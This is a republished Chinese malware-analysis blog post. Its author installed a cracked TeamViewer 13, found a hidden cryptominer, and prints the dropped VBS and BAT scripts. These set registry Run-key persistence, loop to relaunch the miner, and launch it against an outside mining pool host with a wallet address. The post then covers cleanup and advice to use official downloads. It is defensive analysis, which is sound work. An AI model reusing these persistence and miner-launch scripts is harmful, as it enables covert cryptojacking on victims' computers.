当前位置:首页 > 问答百科 > 正文内容

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)

福瑞号2023-05-12 19:26:27问答百科147

不提供TeamViewer激活码分享,建议使用官方免费版或购买正版授权。安装教程步骤详见网站提供的教程。



你下载的TeamViewer13破解版可能有毒

0×0故事背景

最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。

0×1安装过程

先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图1

安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图2

0×2问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图3

直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图4

0.Servicecrsssr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"%windir%winvprse.bat",0SetWShell=Nothing

1.Winprs.bat:

@EchoOffREGADDHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer un/v"Chrome"/f/tREG_SZ/d"%windir%servicecrsssr.vbs"Exit

2.Winvpr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"winprs.bat",0SetWShell=Nothing

3.Winvprse.bat:

@echooffSETLOCALEnableExtensions:starttimeout/t160/nobreakgt;NULechoofftasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="0"gotostarttasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="1"gotoprocessnotrunning:processnotrunningstart"""%windir%xdgaudio.vbs"gotostartexit

4.xdgaudio.vbs

DimWShell

SetWShell=CreateObject("WScript.Shell")WShell.Run"wmipvrse.exe--cpu-priority2--cpu-affinity2-acryptonight-ostratum+tcp://krb.crypto-coins.club:5555-uKjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ-px",0

SetWShell=Nothing

5.Wmipvrse.exe

矿池与钱包都这么出来了,看看到底挖了多少钱。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图5

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图6

0×3逆向分析

对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。

CPU-minergithub上面的开源代码

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图7

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图8

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图9

0×4病毒清理

事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。

Step1:使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat

Winvpr.vbs

Winvprse.bat

Wmipvrse.exe

xdgaudio.vbs

Step2:清除注册表

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图10

0×5总结

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。

3.安全无小事,日常需注意。

*本文作者:si1ence,转载自FreeBuf.COM

扫描二维码推送至手机访问。

版权声明:本文由福瑞号发布,如需转载请注明出处。

本文链接:https://www.furui.com.cn/174981.html

“teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)” 的相关文章

爱女生的句子(写给女生的情话短句)

爱女生的句子(写给女生的情话短句)

一、生命那么短,世界那么乱,我不想争吵,不想冷战,不愿和你有一秒遗憾。 二、缘分,让我遇上你。感觉,让我喜欢你。思念,让我想起你。心痛,让我记住你。时间,让我爱上你。心中,一切都是你。只是,身边缺少你。 三、即使时间是一粒尘埃,生命总还有你存在。即使岁月把容颜篡改,我的爱始终还在。 四、遇见你是偶然...

补漏趁天晴下句是什么(俗语:补漏趁天晴)

补漏趁天晴下句是什么(俗语:补漏趁天晴)

俗语汇今天分享的是关于珍惜时机的俗语:补漏趁天晴,练功趁年轻 俗语字面意思是,房屋漏雨,最好在晴天的时机修补。练习功夫,最好在年纪小的时候。错过时机,就达不到很好的效果。俗语只是借房屋补漏来强调“少小不努力,老大徒悲伤”。如果去钻牛角尖,用少数大器晚成来反驳俗语本意,就失去了俗语的引导寓意。 房...

网上的超a是什么意思(硬核A站:进击“超A”)

网上的超a是什么意思(硬核A站:进击“超A”)

镜像娱乐原创 几天前,知名二次元文娱社区AcFun(A站)UP主见面会在上海如期举行,近百位UP主代表现身这场“AcFun 2020超A交流趴”。会上,A站总经理兼快手二次元垂类负责人文旻宣布,A站将推出签约UP主直播分成“二八计划”与虚拟偶像“AVI联盟计划”,继续发掘并赋能优质UP主与VUP(...

爱在有情天的演员(秃东悠然是什么电视剧)

爱在有情天的演员(秃东悠然是什么电视剧)

秃东悠然是什么电视剧:悠然秀冬是电视剧《爱在有情天》中的角色。 《爱在有情天》是由香港亚视和大连广播电视台联合出品,马景涛,陈秀雯,陈展鹏、马苏,主演,杨绍鸿监制的民国初年电视剧 《爱在有情天》这部剧不仅仅是一个爱情故事,更是一个大家族和荣哀兴衰的故事这部剧不仅仅是一部言情剧,更是展现了一个大家族...

如何测试光纤网速(如何用手机测试500兆宽带网速)

如何测试光纤网速(如何用手机测试500兆宽带网速)

很多用户想要使用手机测试宽带的网速,但又不知道该如何测试,本期文章教大家如何使用第三方软件测试网络传输速度。 正常来讲,100兆的宽带下载速度在10M/S,而500兆的宽带下载速度理论上可以达到50MB/S,但受限于网络设备和环境,大多数家庭宽带网络都达不到这个速度,接下来说测试方法。 一、安装测...

复仇者联盟3谁死了(复仇者联盟3超级英雄真的死去)

复仇者联盟3谁死了(复仇者联盟3超级英雄真的死去)

《复仇者联盟3》中那些成批死去的超级英雄让人惋惜,可是这是真正死亡啦么?虽然众多超级英雄纷纷消失,但未必就是死亡,很多人极有可能会复活。目前看《复联3》中只有幻视和洛基是我们看到的真正意义上的死亡,其实洛基也极有可能没有死,下面我们分析下。 @图片来源于w'l 《复仇者联盟3》中,虽然灭霸被雷...